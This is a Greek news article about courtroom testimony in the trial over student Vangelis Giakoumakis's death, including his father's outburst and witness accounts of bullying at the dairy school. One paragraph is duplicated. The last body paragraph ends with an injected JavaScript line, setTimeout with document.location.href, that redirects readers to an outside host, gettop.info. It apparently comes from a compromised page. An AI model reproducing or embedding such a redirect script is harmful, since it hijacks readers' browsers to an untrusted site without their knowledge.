Ξέσπασμα από τον πατέρα του Γιακουμάκη: Για το παιδί μου ποιος νοιάστηκε; (BINTEO)

0
15

 

Ξέσπασε ο πατέρας του Βαγγέλη Γιακουμάκη, Ανδρέας, όταν άκουσε καθηγητή της Γαλακτοκομικής Σχολής να καταθέτει ως μαρτυρας ισχυριζόμενος ότι είχαν γίνει συμβούλια στη σχολή για τα επεισόδια που είχαν προκαλέσει σπουδαστές και ότι είχαν επιβληθεί ποινές σε ορισμένους από αυτούς (σε κάποιους έγινε επίπληξη και κάποιοι αποβλήθηκαν για τρεις ημέρες).

«Για άλλα ξέρατε να νοιαστείτε. Για το παιδί μου που πέθανε ποιος νοιάστηκε;» είπε ο Ανδρέας Γιακουμάκης στο Τριμελές Εφετείο Πλημμελειοδικών Ιωαννίνων. Ο πατέρας του Βαγγέλη διέκοψε απευθυνόμενος προς τον καθηγητή και είπε: «Για τις ποινές βλέπω τα λέτε όλα με λεπτομέρειες. Για τα όσα είχαν να κάνουν με τον Βαγγέλη δεν βλέπω να λέτε τίποτα».

Ο δεύτερος μάρτυρας που εξετάστηκε χθες ήταν ο φύλακας της Σχολής, ο οποίος κατέθεσε ότι είχε ενημερωθεί από δύο σπουδαστές ότι οι συντοπίτες του Βαγγέλη τον είχαν κλείσει σε μία ντουλάπα, τον είχαν κρεμάσει από το παράθυρο και του έκλειναν το ζεστό νερό στο μπάνιο. Ωστόσο, όπως πρόσθεσε δεν είχε δει τίποτα από όλα αυτά ο ίδιος.

Ο τρίτος μάρτυρας ήταν υπάλληλος της Σχολής, τυροκόμος που εργάζεται στα εργαστήρια, ο οποίος αναφέρθηκε στην αδιάκοπη παρέα που έκανε ο Βαγγέλης με τους Κρητικούς, υπογραμμίζοντας παράλληλα πως δεν είχε δει στον αείμνηστο Βαγγέλη κάποιο σωματικής βίας, ούτε είχε μάθει κάτι πριν εξαφανιστεί.

Νωρίτερα ο φύλακας της Σχολής είχε επισημάνει στην κατάθεσή του ότι ακόμη και μετά την αποφοίτηση της προηγούμενης χρονιάς, ο Βαγγέλης εξακολουθούσε να κάνει παρέα μόνο με τους Κρητικούς. Ο φύλακας κατέθεσε επίσης ότι είχε ενημερωθεί από δύο σπουδαστές ότι οι συντοπίτες του Βαγγγέλη τον είχαν κλείσει σε μια ντουλάπα, τον είχαν κρεμάσει από το παράθυρο και του έκλειναν το ζεστό νερό στο μπάνιο. Ωστόσο όπως πρόσθεσε δεν είχε δει τίποτα από αυτά ο ίδιος.

Ο συνήγορος του κατηγορουμένου πρώην διευθυντή της Γαλακτοκομικής Σχολής κ. Αλέξης Κούγιας δήλωσε ότι θα ασκήσει μήνυση σε βάρος του εκπροσώπου του Ελληνικού Γεωργικού Οργανισμού «Δήμητρα», όπου ανήκει η Σχολή, χωρίς να δώσει περισσότερες λεπτομέρειες. Κάποια στιγμή και ενώ το κλίμα ήταν ηλεκτρισμένο ένας παριστάμενος απευθύνθηκε προς τον κ. Κούγια λέγοντας «θα έπρεπε να ντρέπεστε». Ο κ. Κούγιας έγινε έξω φρενών, ζήτησε από τους αστυνομικούς να συλλάβουν το άτομο αυτό και στη συνέχεια απείλησε ότι θα κινηθεί νομικά σε βάρος των αστυνομικών αν τον αγνοήσουν. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here